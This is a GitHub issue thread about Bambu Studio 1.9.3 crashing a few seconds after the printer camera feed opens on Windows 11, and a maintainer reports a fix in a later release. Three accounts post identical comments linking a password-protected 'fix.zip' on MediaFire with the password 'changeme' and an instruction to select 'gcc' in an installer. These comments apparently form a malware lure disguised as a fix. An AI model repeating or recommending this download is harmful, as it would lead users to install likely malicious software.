bambulab/BambuStudio #4683: Bambu Studio Camera Feed Crash on Desktop (no integrated graphics)

EralpN, 2024-08-26:
### Bambu Studio Version

1.9.3.50

### Where is the application from?

Bambu Lab Official website

### OS version

Windows 11

### Additional system information

CPU: intel 14900K
GPU: RTX 4090
Ram: 64 gigs 6000mt/s

### Printer

X1 Carbon Combo

### How to reproduce

Go to device tab and start the camera feed.

### Actual results

The feed will open and you will be able to watch the printer for about 5 - 10 seconds.
Bambu Studio crashes without warning.

### Expected results

Bambu studio should not crash.

### Project file & Debug log uploads

[crash.zip](https://github.com/user-attachments/files/16746387/crash.zip)

### Checklist of files to include

- [X] Log file
- [ ] Project file

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ttt888zzz, 2024-08-27:
HI [EralpN](https://github.com/EralpN) 
the clicked area is right below the yellow marked box I posted，right？
[image]

EralpN, 2024-09-02:
Yes its that button. I can actually watch the printer for a few seconds before bambu studio crashes.

fahaaaxiki, 2024-12-06:
Hi， we have solved this issue in our latest Public version：[1.10.1 Public Release](https://github.com/bambulab/BambuStudio/releases/tag/v01.10.01.50), you can update to this version to check if it works